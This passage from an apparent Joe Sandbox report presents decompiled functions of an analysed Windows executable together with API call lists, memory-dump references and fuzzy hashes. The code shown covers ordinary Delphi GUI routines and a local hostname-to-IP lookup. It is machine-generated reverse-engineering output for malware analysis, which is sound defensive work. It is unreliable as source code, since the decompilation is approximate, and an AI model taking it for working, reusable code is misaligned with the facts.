                                                                                                                                                                                                                            						_t18 = GetMenuState(E0044AE70(_t48), _t46, 0x400);
                                                                                                                                                                                                                            						if((_t18 & 0x00000004) == 0) {
                                                                                                                                                                                                                            							_t18 = RemoveMenu(E0044AE70(_t48), _t46, 0x400);
                                                                                                                                                                                                                            							_t40 = 1;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t47 = _t47 - 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t40 != 0) {
                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                            							E0044AC00(_t48);
                                                                                                                                                                                                                            							L15:
                                                                                                                                                                                                                            							return  *((intOrPtr*)( *_t48 + 0x3c))();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t44 =  *0x449854; // 0x4498a0
                                                                                                                                                                                                                            						if(E00403D78( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E0044AE70(_t48)) != 0) {
                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							DestroyMenu( *(_t48 + 0x34));
                                                                                                                                                                                                                            							 *(_t48 + 0x34) = 0;
                                                                                                                                                                                                                            							goto L15;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t18;
                                                                                                                                                                                                                            			}










Memory Dump Source
• Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5343eef08e8d1dd02cbbfae1b5f1536b7b7bec594a8a1cd2160f538fd193b115
• Instruction ID: ccdcb766eb864ac881303502937fc5a84d080c6be124c079d60bb56e6bda1b55
• Opcode Fuzzy Hash: 5343eef08e8d1dd02cbbfae1b5f1536b7b7bec594a8a1cd2160f538fd193b115
• Instruction Fuzzy Hash: 7111D270EC521857FB60BEBA8806B5B378A5F41749F14042FBD119B782DA3CDC65829F
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0045A390(void* __eax, void* __ecx, struct HWND__** __edx) {
                                                                                                                                                                                                                            				intOrPtr _t11;
                                                                                                                                                                                                                            				intOrPtr _t20;
                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                            				struct HWND__** _t34;
                                                                                                                                                                                                                            				struct HWND__* _t35;
                                                                                                                                                                                                                            				struct HWND__* _t36;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t31 = __ecx;
                                                                                                                                                                                                                            				_t34 = __edx;
                                                                                                                                                                                                                            				_t33 = __eax;
                                                                                                                                                                                                                            				_t30 = 0;
                                                                                                                                                                                                                            				_t11 =  *((intOrPtr*)(__edx + 4));
                                                                                                                                                                                                                            				if(_t11 < 0x100 || _t11 > 0x108) {
                                                                                                                                                                                                                            					L16:
                                                                                                                                                                                                                            					return _t30;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t35 = GetCapture();
                                                                                                                                                                                                                            					if(_t35 != 0) {
                                                                                                                                                                                                                            						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x49e668 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
                                                                                                                                                                                                                            							_t30 = 1;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t36 =  *_t34;
                                                                                                                                                                                                                            					_t2 = _t33 + 0x44; // 0x0
                                                                                                                                                                                                                            					_t20 =  *_t2;
                                                                                                                                                                                                                            					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
                                                                                                                                                                                                                            						L7:
                                                                                                                                                                                                                            						if(E00437E5C(_t36, _t31) == 0 && _t36 != 0) {
                                                                                                                                                                                                                            							_t36 = GetParent(_t36);
                                                                                                                                                                                                                            							goto L7;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(_t36 == 0) {
                                                                                                                                                                                                                            							_t36 =  *_t34;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t36 = E00441704(_t20);
                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                            						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
                                                                                                                                                                                                                            							_t30 = 1;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}











APIs
Memory Dump Source
• Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
Yara matches
Similarity
• API ID: MessageSend$CaptureLongWindow
• String ID:
• API String ID: 1158686931-0
• Opcode ID: 5b89e33d5f33cfaebd5b1cc37b20e9e534ad05d39b8e2e3f38a1a5aac5179a0b
• Instruction ID: 3b7db6bc04ec6c9b9a315d118ec06550147a56b28b89c41b1f9545d3d98f8dbc
• Opcode Fuzzy Hash: 5b89e33d5f33cfaebd5b1cc37b20e9e534ad05d39b8e2e3f38a1a5aac5179a0b
• Instruction Fuzzy Hash: 491193712042095F9620FA9DC884F1373CC9B15319B10453AFD59C3343EAACFC54826B
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 22%
                                                                                                                                                                                                                            			E00442F0C(void* __eax) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				intOrPtr* _t14;
                                                                                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                                                                                            				intOrPtr _t19;
                                                                                                                                                                                                                            				intOrPtr* _t21;
                                                                                                                                                                                                                            				intOrPtr* _t26;
                                                                                                                                                                                                                            				intOrPtr _t37;
                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                            				intOrPtr _t47;
                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                            				void* _t51;
                                                                                                                                                                                                                            				intOrPtr _t52;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t49 = _t51;
                                                                                                                                                                                                                            				_t52 = _t51 + 0xfffffff4;
                                                                                                                                                                                                                            				_t39 = __eax;
                                                                                                                                                                                                                            				if( *((short*)(__eax + 0x68)) == 0xffff) {
                                                                                                                                                                                                                            					return __eax;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t14 =  *0x49d970; // 0x49e900
                                                                                                                                                                                                                            					_t17 =  *0x49d970; // 0x49e900
                                                                                                                                                                                                                            					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
                                                                                                                                                                                                                            					_push(_t19);
                                                                                                                                                                                                                            					L0042C408();
                                                                                                                                                                                                                            					_v8 = _t19;
                                                                                                                                                                                                                            					_push(_t49);
                                                                                                                                                                                                                            					_push(0x442fcc);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t52;
                                                                                                                                                                                                                            					_t21 =  *0x49de0c; // 0x49ebbc
                                                                                                                                                                                                                            					E0042C440(_v8, E004586EC( *_t21,  *((short*)(__eax + 0x68))));
                                                                                                                                                                                                                            					_t26 =  *0x49de0c; // 0x49ebbc
                                                                                                                                                                                                                            					E0042C440(_v8, E004586EC( *_t26,  *((short*)(_t39 + 0x68))));
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(_v8);
                                                                                                                                                                                                                            					L0042C48C();
                                                                                                                                                                                                                            					_push( &_v16);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					L0042C49C();
                                                                                                                                                                                                                            					_push(_v12);
                                                                                                                                                                                                                            					_push(_v16);
                                                                                                                                                                                                                            					_push(1);
                                                                                                                                                                                                                            					_push(_v8);
                                                                                                                                                                                                                            					L0042C48C();
                                                                                                                                                                                                                            					_pop(_t47);
                                                                                                                                                                                                                            					 *[fs:eax] = _t47;
                                                                                                                                                                                                                            					_push(0x442fd3);
                                                                                                                                                                                                                            					_t37 = _v8;
                                                                                                                                                                                                                            					_push(_t37);
                                                                                                                                                                                                                            					L0042C410();
                                                                                                                                                                                                                            					return _t37;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73751AB0.COMCTL32(00000000), ref: 00442F3E
                                                                                                                                                                                                                              • Part of subcall function 0042C440: 73752140.COMCTL32(00439016,000000FF,00000000,00442F6E,00000000,00442FCC,?,00000000), ref: 0042C444
                                                                                                                                                                                                                            • 73751680.COMCTL32(00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442F92
                                                                                                                                                                                                                            • 73751710.COMCTL32(00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442F9D
                                                                                                                                                                                                                            • 73751680.COMCTL32(00439016,00000001,?,00443035,00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442FB0
                                                                                                                                                                                                                            • 73751F60.COMCTL32(00439016,00442FD3,00443035,00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442FC6
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: 7375173751680$7375171073752140
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3191654781-0
                                                                                                                                                                                                                            • Opcode ID: dd8f6c6bef30573f89024d1b65c38e83719737ac9faca5af5380f6cb668c253e
                                                                                                                                                                                                                            • Instruction ID: 31acb13db4a7b61839ae31ff436912f2200b31873635aba84f9d8170318329f8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd8f6c6bef30573f89024d1b65c38e83719737ac9faca5af5380f6cb668c253e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B216F74B04204AFEB10EBA9DCD2F6E73F8EB48704F900066F904DB291DAB9AD40C758
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                            			E00472C58(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				char _v408;
                                                                                                                                                                                                                            				char _v412;
                                                                                                                                                                                                                            				char _v416;
                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                            				char* _t38;
                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                            				intOrPtr _t48;
                                                                                                                                                                                                                            				intOrPtr* _t53;
                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                            				void* _t56;
                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v416 = 0;
                                                                                                                                                                                                                            				_v412 = 0;
                                                                                                                                                                                                                            				 *[fs:eax] = _t58 + 0xfffffe64;
                                                                                                                                                                                                                            				_t38 = E00408D24(0x104, __eflags);
                                                                                                                                                                                                                            				L00472BD0();
                                                                                                                                                                                                                            				_v8 = E00403BBC(1);
                                                                                                                                                                                                                            				 *((intOrPtr*)( *_v8 + 0x44))(0x101,  &_v408,  *[fs:eax], 0x472d31, _t58, __edi, __esi, __ebx, _t56);
                                                                                                                                                                                                                            				E00404BB8( &_v412, _t38);
                                                                                                                                                                                                                            				_t30 = gethostname(_t38, E00404C80(_v412));
                                                                                                                                                                                                                            				_push(_t38);
                                                                                                                                                                                                                            				L00472BC0();
                                                                                                                                                                                                                            				if(_t30 != 0) {
                                                                                                                                                                                                                            					_t55 =  *((intOrPtr*)(_t30 + 0xc));
                                                                                                                                                                                                                            					_t39 = 0;
                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                            						_t53 =  *((intOrPtr*)(_t55 + _t39 * 4));
                                                                                                                                                                                                                            						if(_t53 == 0) {
                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						L00472BB8();
                                                                                                                                                                                                                            						E00404BB8( &_v416, _t30);
                                                                                                                                                                                                                            						_t30 =  *((intOrPtr*)( *_v8 + 0x38))( *_t53);
                                                                                                                                                                                                                            						_t39 = _t39 + 1;
                                                                                                                                                                                                                            						__eflags = _t39;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					L00472BD8();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t48);
                                                                                                                                                                                                                            				 *[fs:eax] = _t48;
                                                                                                                                                                                                                            				_push(0x472d38);
                                                                                                                                                                                                                            				return E004049E4( &_v416, 2);
                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • WSAStartup.WSOCK32(00000101,?,00000000,00472D31), ref: 00472C98
                                                                                                                                                                                                                            • gethostname.WSOCK32(00000000,00000000), ref: 00472CCE
                                                                                                                                                                                                                            • gethostbyname.WSOCK32(00000000,00000000,00000000), ref: 00472CD4
                                                                                                                                                                                                                            • inet_ntoa.WSOCK32(?,00000000,00000000,00000000), ref: 00472CE6
                                                                                                                                                                                                                            • WSACleanup.WSOCK32(?,00000000,00000000,00000000), ref: 00472D0E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 348263315-0
                                                                                                                                                                                                                            • Opcode ID: f06fb68704c44451b8735ee50c57d78fe34c005703e9fb394dc065d854421570
                                                                                                                                                                                                                            • Instruction ID: f3059b0da6ec3e1b640db76434b3b8e2fe7969af481d0775728bf7a32dd752b6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f06fb68704c44451b8735ee50c57d78fe34c005703e9fb394dc065d854421570
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A521C3706001049FD760EF31CD91ADAB7F8EF45304F5184FAA94CA7352DAB8AE418B98
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 78%
                                                                                                                                                                                                                            			E0042A288(struct HPALETTE__* __eax) {
                                                                                                                                                                                                                            				struct HPALETTE__* _t21;
                                                                                                                                                                                                                            				char _t28;
                                                                                                                                                                                                                            				signed int _t30;
                                                                                                                                                                                                                            				struct HPALETTE__* _t36;
                                                                                                                                                                                                                            				struct HPALETTE__* _t37;
                                                                                                                                                                                                                            				struct HDC__* _t38;
                                                                                                                                                                                                                            				intOrPtr _t39;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t21 = __eax;
                                                                                                                                                                                                                            				_t36 = __eax;
                                                                                                                                                                                                                            				_t39 =  *((intOrPtr*)(__eax + 0x28));
                                                                                                                                                                                                                            				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t39 + 0x10) == 0 &&  *((intOrPtr*)(_t39 + 0x14)) != 0) {
                                                                                                                                                                                                                            					_t22 =  *((intOrPtr*)(_t39 + 0x14));
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t39 + 0x14)) ==  *((intOrPtr*)(_t39 + 8))) {
                                                                                                                                                                                                                            						E00428BFC(_t22);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t21 = E00426750( *((intOrPtr*)(_t39 + 0x14)), 1 <<  *(_t39 + 0x3e));
                                                                                                                                                                                                                            					_t37 = _t21;
                                                                                                                                                                                                                            					 *(_t39 + 0x10) = _t37;
                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						L00407638();
                                                                                                                                                                                                                            						_t21 = E00426060(_t21);
                                                                                                                                                                                                                            						_t38 = _t21;
                                                                                                                                                                                                                            						if( *((char*)(_t39 + 0x71)) != 0) {
                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                            							_t28 = 1;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_push(0xc);
                                                                                                                                                                                                                            							_push(_t38);
                                                                                                                                                                                                                            							L00407380();
                                                                                                                                                                                                                            							_push(0xe);
                                                                                                                                                                                                                            							_push(_t38);
                                                                                                                                                                                                                            							L00407380();
                                                                                                                                                                                                                            							_t30 = _t21 * _t21;
                                                                                                                                                                                                                            							_t21 = ( *(_t39 + 0x2a) & 0x0000ffff) * ( *(_t39 + 0x28) & 0x0000ffff);
                                                                                                                                                                                                                            							if(_t30 < _t21) {
                                                                                                                                                                                                                            								goto L9;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t28 = 0;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						 *((char*)(_t39 + 0x71)) = _t28;
                                                                                                                                                                                                                            						if(_t28 != 0) {
                                                                                                                                                                                                                            							_t21 = CreateHalftonePalette(_t38);
                                                                                                                                                                                                                            							 *(_t39 + 0x10) = _t21;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_push(_t38);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						L00407888();
                                                                                                                                                                                                                            						if( *(_t39 + 0x10) == 0) {
                                                                                                                                                                                                                            							 *((char*)(_t36 + 0x30)) = 1;
                                                                                                                                                                                                                            							return _t21;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t21;
                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2DE
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2F3
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2FD
                                                                                                                                                                                                                            • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A321
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A32C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B380CreateHalftonePalette
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 178651289-0
                                                                                                                                                                                                                            • Opcode ID: e67643a24833364483348e8498fc212bf2f1e615a4c10726663e597d674b9aa6
                                                                                                                                                                                                                            • Instruction ID: a69a9921d942d4c2fc4b887ba219ee821ce262c4093934c48757552ca675d17f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e67643a24833364483348e8498fc212bf2f1e615a4c10726663e597d674b9aa6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E211B4217092699BEB20EF25A4457EF3690AB10359F84012AFD0097281D7BC9CA5C3EA
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 62%
                                                                                                                                                                                                                            			E00457988(void* __eax) {
                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                            				signed int _t41;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t16 = __eax;
                                                                                                                                                                                                                            				_t38 = __eax;
                                                                                                                                                                                                                            				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x49be68 != 0) {
                                                                                                                                                                                                                            					_t16 = E00441A08(__eax);
                                                                                                                                                                                                                            					if(_t16 != 0) {
                                                                                                                                                                                                                            						_t41 = GetWindowLongA(E00441704(_t38), 0xffffffec);
                                                                                                                                                                                                                            						if( *((char*)(_t38 + 0x2e0)) != 0 ||  *((char*)(_t38 + 0x2e8)) != 0) {
                                                                                                                                                                                                                            							if((_t41 & 0x00080000) == 0) {
                                                                                                                                                                                                                            								SetWindowLongA(E00441704(_t38), 0xffffffec, _t41 | 0x00080000);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							return  *0x49be68(E00441704(_t38),  *((intOrPtr*)(_t38 + 0x2ec)),  *((intOrPtr*)(_t38 + 0x2e1)),  *0x0049BEEC |  *0x0049BEF4);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							SetWindowLongA(E00441704(_t38), 0xffffffec, _t41 & 0xfff7ffff);
                                                                                                                                                                                                                            							_push(0x485);
                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                            							_t37 = E00441704(_t38);
                                                                                                                                                                                                                            							_push(_t37);
                                                                                                                                                                                                                            							L00407860();
                                                                                                                                                                                                                            							return _t37;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t16;
                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 004579BC
                                                                                                                                                                                                                            • SetWindowLongA.USER32 ref: 004579EE
                                                                                                                                                                                                                            • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,0045557C), ref: 00457A28
                                                                                                                                                                                                                            • SetWindowLongA.USER32 ref: 00457A41
                                                                                                                                                                                                                            • 73C9B330.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,0045557C), ref: 00457A57
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$Long$AttributesB330Layered
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1770052509-0
                                                                                                                                                                                                                            • Opcode ID: 7ade270508231717ce0c7eeda558c4dcfd1cac8646c36d69f970ba05a401db38
                                                                                                                                                                                                                            • Instruction ID: c75218e602284ca66c221aec59f9fe954b3d3a500fdcd06e0ec5254f6f3a142b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ade270508231717ce0c7eeda558c4dcfd1cac8646c36d69f970ba05a401db38
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4411EB51A4829065EF10AE799CC9BCE1A8C5B05329F04157BBD45EB2E3CA7C8C48C36C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 40%
                                                                                                                                                                                                                            			E004266B8(intOrPtr __eax) {
                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				intOrPtr _t14;
                                                                                                                                                                                                                            				intOrPtr _t16;
                                                                                                                                                                                                                            				intOrPtr _t18;
                                                                                                                                                                                                                            				intOrPtr _t21;
                                                                                                                                                                                                                            				intOrPtr _t30;
                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                            				intOrPtr _t35;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t32 = _t34;
                                                                                                                                                                                                                            				_t35 = _t34 + 0xfffffff8;
                                                                                                                                                                                                                            				_v5 = 0;
                                                                                                                                                                                                                            				if( *0x49e894 == 0) {
                                                                                                                                                                                                                            					return _v5;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					L00407638();
                                                                                                                                                                                                                            					_v12 = __eax;
                                                                                                                                                                                                                            					_push(_t32);
                                                                                                                                                                                                                            					_push(0x42673e);
                                                                                                                                                                                                                            					_push( *[fs:edx]);
                                                                                                                                                                                                                            					 *[fs:edx] = _t35;
                                                                                                                                                                                                                            					_push(0x68);
                                                                                                                                                                                                                            					_t14 = _v12;
                                                                                                                                                                                                                            					_push(_t14);
                                                                                                                                                                                                                            					L00407380();
                                                                                                                                                                                                                            					if(_t14 >= 0x10) {
                                                                                                                                                                                                                            						_push(__eax + 4);
                                                                                                                                                                                                                            						_push(8);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_t18 =  *0x49e894; // 0x5e080725
                                                                                                                                                                                                                            						_push(_t18);
                                                                                                                                                                                                                            						L004073A8();
                                                                                                                                                                                                                            						_push(__eax + ( *(__eax + 2) & 0x0000ffff) * 4 - 0x1c);
                                                                                                                                                                                                                            						_push(8);
                                                                                                                                                                                                                            						_push(8);
                                                                                                                                                                                                                            						_t21 =  *0x49e894; // 0x5e080725
                                                                                                                                                                                                                            						_push(_t21);
                                                                                                                                                                                                                            						L004073A8();
                                                                                                                                                                                                                            						_v5 = 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_pop(_t30);
                                                                                                                                                                                                                            					 *[fs:eax] = _t30;
                                                                                                                                                                                                                            					_push(0x426745);
                                                                                                                                                                                                                            					_t16 = _v12;
                                                                                                                                                                                                                            					_push(_t16);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					L00407888();
                                                                                                                                                                                                                            					return _t16;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            0x00426721
                                                                                                                                                                                                                            0x00426727
                                                                                                                                                                                                                            0x0042672a
                                                                                                                                                                                                                            0x0042672d
                                                                                                                                                                                                                            0x00426732
                                                                                                                                                                                                                            0x00426735
                                                                                                                                                                                                                            0x00426736
                                                                                                                                                                                                                            0x00426738
                                                                                                                                                                                                                            0x0042673d
                                                                                                                                                                                                                            0x0042673d

